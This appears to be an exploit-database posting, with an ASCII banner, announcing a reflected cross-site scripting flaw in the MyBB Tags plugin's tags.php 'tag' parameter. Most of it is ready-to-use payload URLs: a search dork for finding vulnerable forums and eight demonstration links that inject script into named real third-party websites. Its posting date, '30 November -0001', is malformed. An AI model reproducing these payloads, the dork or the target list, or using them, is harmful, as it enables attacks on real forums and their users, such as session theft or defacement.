Mybb Tags Plugin Cross-Site Scripting Vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>Mybb Tags Plugin Cross-Site Scripting Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>################################# # # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@ # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@ # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@ # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@ # ##################################### ##################################### # Iranian Exploit DataBase # Mybb Tags Plugin Cross-Site Scripting Vulnerability # Version Tag Plugin : 1.* # Vulnerable: 1.6.* and 1.8.* # Vendor site : https://mods.mybb.com/view/tag-system # Dork : "MyBB, © 2002-2016" + inurl:tags.php?tag= # Author : IeDb.Ir # Site : Www.IeDb.Ir - Www.IeDb.Ir/acc - xssed.Ir - kkli.ir # Vulnerability attack information site : http://xssed.Ir/ ##################################### Bug : http://www.site.com/mybb/tags.php?tag=[Xss] Dem0 : http://mybbskin.ir/tags.php?tag="><script>alert(/IeDb.Ir/)</script> http://www.forum.woc.ir/tags.php?tag="><script>alert(/IeDb.Ir/)</script> http://www.lawwiki.ir/forum/tags.php?tag="><script>alert(/IeDb.Ir/)</script> http://www.andysheh.com/talar/tags.php?tag="><script>alert(/IeDb.Ir/)</script> http://stertixforum.altervista.org/tags.php?tag=mybb"><script>alert(/IeDb.Ir/)</script> http://bmw-diag.pl/tags.php?tag=ZUSB"><script>alert(/IeDb.Ir/)</script> http://www.englishlearner.info/forum/tags.php?tag="><script>alert(/IeDb.Ir/)</script> http://www.forumszklarskaporeba.pl/tags.php?tag=T%C5%82usty%3Cinput%20onfocus=alert%281%29%20autofocus%3E ##################################### # Archive Exploit = http://iedb.ir/exploits-4982.html ##################################### </BODY></HTML>
